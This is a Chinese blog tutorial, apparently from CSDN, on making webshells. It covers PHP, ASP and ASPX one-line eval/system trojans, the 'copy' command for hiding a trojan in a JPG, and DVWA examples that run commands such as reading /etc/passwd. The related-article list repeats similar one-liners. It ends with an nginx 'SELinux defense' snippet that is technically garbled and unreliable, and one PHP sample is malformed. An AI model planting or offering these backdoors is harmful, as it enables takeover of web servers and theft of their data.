文件上传 webshell 各类型 一句话木马 图片马 制作 教程

最新推荐文章于 2024-05-29 07:40:26 发布
最新推荐文章于 2024-05-29 07:40:26 发布
阅读量1w 收藏 18
点赞数 3
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44286136/article/details/117597604
版权

webshell
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
小马:一句话木马也称为小马,即整个shell代码量只有一行,一般时系统执行函数
大马:代码量和功能比小马多,一般会进入二次编码加密,防止被防火墙/入侵系统检测到
图片马:一般直接上传木马文件都会被过滤拦截,这时候就需要用到图片马。

php 文章后面有几种php木马实践

<?php @eval('$_PSOT['admin']);?>
<?php eval($_REQUEST['admin']);?>
<?php system($_REQUEST['admin']);?>

asp

<%eval request ("admin")%>

aspx

<%@ Page Language="Jscript"%> <%eval(Request.Item["admin"],"unsafe");%>

原理:
以 php 的一句话木马为例,<?php @eval('$_PSOT['admin']);?> 语句能作为木马,其原理是利用 php 中的 eval 函数,将传入的任何语句作为 php 语句执行,因此当传入该木马时,通过访问该文件,以 post 方式传入参数,eval 函数再将接收的语句作为 php 语句执行,这就构成了连接。
其中admin是一个变量名,用来接收语句,也可以称之为密码。
@ 在php中的作用是抑制错误提示。
例如:加入已植入该木马,使用 POST 方式接收参数 phpinfo(),再通过 eval 将其作为php语句执行,就查看了站点的 php 信息。

图片马
所谓图片马,就是将一句话木马与图片相结合,使得图片中包含代码。
使用语句 生成图片马:

copy 图片.jpg/b + 木马.php/a 木马.jpg

/b 表示以二进制方式打开
/a 表示以ASCII方式打

介绍php的几种
shell.php 使用php函数 菜刀连接
<?php @eval('$_PSOT['admin']);?>
在这里插入图片描述

在这里插入图片描述

shell2.php #eveal 使用php函数,例如phpinfo();
<?php eval($_REQUEST['admin']);?>
http://192.168.0.7/dvwa/hackable/uploads/shell.php?admin=phpinfo();
在这里插入图片描述
**
post是想用中国菜刀之类的工具连接获取shell,是C/S架构。
request是在网页端输入变量访问**

shell3.php #systeam使用linux系统命令,例如ls,cat,rm,cp
<?php system($_REQUEST['admin']);?>
http://192.168.8.134/dvwa/hackable/uploads/shell3.php?yangge=cat /etc/passwd
在这里插入图片描述

营长s
关注
  • 3
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一句话木马图片
野原新之助
01-16 6496
何为木? 所谓木,即向目标主机种植恶意软件或程序(木),通过主机与目标主机上种植好的木进行连接,建立一个shell,达到控制目标主机的目的。 比较著名的木有冰河、灰鸽子等,这些木都是对主机进行控制。 今天总结的一句话木马,是通过对目标站点、服务器植入木文件,对网站进行渗透控制。 通常对网站的木文件植入,都是利用文件上传漏洞进行植入的,先植入小,再通过小将大植入。 小一...
jsp一句话木马_图片解析
weixin_39965881的博客
11-21 4415
PHP图片 实现运行环境介绍本测试主要针对的是 IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的 在默认Fast-CGI开启状况下,黑阔上传一个名字为wooyun.jpg,内容为...
一句话图片
qq_44111753的博客
08-20 1万+
一句话图片 一、准备图片 1、准备任意图片pho.jpg 2、准备木文件hack.php <?php @eval($_POST['hack']);?> 3、利用系统命令,将木复制到图片文件中,产生图片hack.jpg copy pho.jpg/b+hack.php/a hack.jpg b二进制格式,a为ASCII 二、上传图片 三、利用文件包含漏洞解析图片(没有文件包含漏洞图片将无法执行) 1、 右键图片复制图片地址,找到图片具体位置(upload//4820
java安全——jsp一句话木马
最新发布
qq_53058639的博客
05-29 431
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~不会回显执行的结果只能在后台打印一个地址,常用来反弹shell。如果你对网络安全入门感兴趣,那么你需要的话可以。④50份安全攻防面试指南。⑨历年CTF夺旗赛题解析。③安全攻防357页笔记。⑥HW护网行动经验总结。⑦100个漏洞实战案例。⑤安全红队渗透工具包。
渗透测试学习 十四、 脚本木制作与原理
weixin_30469895的博客
05-10 292
大纲:webshell制作与原理    webshell使用技巧    webshell“黑吃黑” webshell制作原理   webshell种类     一句话木马(使用的最多)、小、大、打包、脱裤、、、   一句话木马     介绍:短小精悍,并且功能强大、隐蔽性非常好,在入侵种始终扮演着非常重要的角色     e.g:<%execute request("v...
——文件上传
在这里,你可以了解到关于C++,数据结构,Linux等知识点
04-21 669
WebShell就是以网页文件形式(asp\php\jsp)存在的一种命令执行环境,客户端通过远程连接,利用W ebS h ell连接到服务器,并可对服务器进行操作。前提是后端一定可以解析这种环境。
关于图片的正确用法
热门推荐
qq_42311391的博客
04-23 4万+
图片,有木,然而菜刀连接不上,你绝望吗?不怕今天我会教大家的。 我们先看一下源码吧,过关方式也是叫我们上传图片。。。 然后我还要说吗一下,图片不是一张木图片一个菜刀就可以了的。还需要一个漏洞,叫做文件包含漏洞。。。这个漏洞原理呢 一:准备图片 需要用到DOS指令 Bash copy 001.jpeg/b + test.php/a 2.jpg 这个...
web安全-文件上传漏洞-图片制作-相关php函数讲解-upload靶场通关详细教学(3)
wangluoanquan111的博客
02-26 1195
此关涉及到了二次渲染的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP。此语句就是一个检测,如果上传的文件是php格式就得不到图片的尺寸,就会返回错误,后面的代码就无法执行,文件就没办法成功上传。
用bat制作图片——一句话木马
AiENG_07的博客
11-29 1003
此命令关闭在控制台中回显命令,因此只有命令的输出可见,而不是命令本身。: 使用二进制拷贝将图像文件和 PHP 文件合并,并创建一个新的图像文件。使用 copy 命令将两个文件的内容合并,创建一个新的图像文件。: 提示用户将 PHP 文件拖放到窗口中,并按 Enter。: 提示用户确保图像文件和 PHP 文件位于相同的路径下。: 提示用户将图像文件拖放到窗口中,并按 Enter。提示用户输入图像文件和 PHP 文件的路径。: 用于接收用户输入的 PHP 文件路径。: 用于接收用户输入的图像文件路径。
创建一句话木马图片
weixin_45571987的博客
04-04 1074
图片一句话木马的编写使用cmd命令行创建图片一句话木马 使用cmd命令行创建图片一句话木马 copy 1.jpg/b+1.php/a 5.jpg 这边图片就成功创建了
你真的了解一句话木马吗?
Elite的博客
04-14 1万+
一句话木马是大多网安人在初步学习中,遇到的一种简单的木文件,但是你真的了解它吗?
JSP文件管理器,挺老个程序,但好用
05-21
JSP文件管理器0.5版本,显示目录和文件,支持cmd操作
JSP文件
08-13
jsp, 放到网站可以访问的目录, 访问页面,即可管理服务器内容.切勿用于非法用途
aspx大小
11-02
朋友的专业大,发出来大家使用,大家不要客气,踊跃下载,现在大的有用资料不多呢:)
PHP实现webshell扫描文件木的方法
10-19
主要介绍了PHP实现webshell扫描文件木的方法,涉及php针对数值传输的过滤操作与文件识别等相关安全操作技巧,需要的朋友可以参考下
PHP 木攻击防御技巧
12-18
了解PHP木的常见特征,如“一句话木马”及其加密形式,可以帮助识别异常代码。此外,保持系统和应用程序的更新,修复已知漏洞,是预防攻击的基础。 总之,防御PHP木攻击需要多方面的策略,包括但不限于限制脚本...
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
PHP网站中的一句话木马安全性和防范措施的研究.pdf
01-05
一句话木马的入侵过程可以分为四步:首先登录网站后台,找到文件上传点,通过搜索“dedecms上传文件”即可获取文件上传的入口;其次,上传已准备好的PHP一句话木马文件;第三,访问该文件的路径,查看是否可以访问;...
Aspx一句话网Webshell.rar
01-07
ASPX一句话网,也称为Webshell,是黑客在成功入侵Web服务器后,为了长期控制服务器而上传的一种小型脚本程序。它通常是一段简短的ASP.NET代码,能够执行命令、读取、写入或删除文件,甚至控制系统。这个压缩包文件...
通过SELinux设置防止webshell.php一句话木马访问Linux服务器上nginx代理网站外的其他资源
06-11
可以通过SELinux设置防止webshell.php一句话木马访问Linux服务器上nginx代理网站外的其他资源,以下是具体步骤: 1. 确认SELinux状态:使用命令`getenforce`检查SELinux是否开启,如果输出`Enforcing`,则SELinux处于开启状态。 2. 安装SELinux工具包:使用命令`yum install setroubleshoot setools`安装SELinux工具包。 3. 配置nginx代理:在nginx配置文件中添加以下内容: ```nginx location ~ \.php$ { fastcgi_pass unix:/run/php-fpm/php-fpm.sock; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include fastcgi_params; # SELinux配置 index webshell.php; # 只允许访问webshell.php文件 setsebool -P httpd_can_network_connect 0; # 禁止访问网络资源 } ``` 其中`index webshell.php`限制只允许访问webshell.php文件,`setsebool -P httpd_can_network_connect 0`禁止访问网络资源。 4. 更新SELinux策略:使用命令`restorecon -R /path/to/nginx`更新SELinux策略。 通过以上步骤,可以限制webshell.php一句话木马访问Linux服务器上nginx代理网站外的其他资源,提高服务器的安全性。需要注意的是,如果修改SELinux策略不当,可能会影响nginx服务的正常运行。建议在操作前备份相关文件,以防意外情况的发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值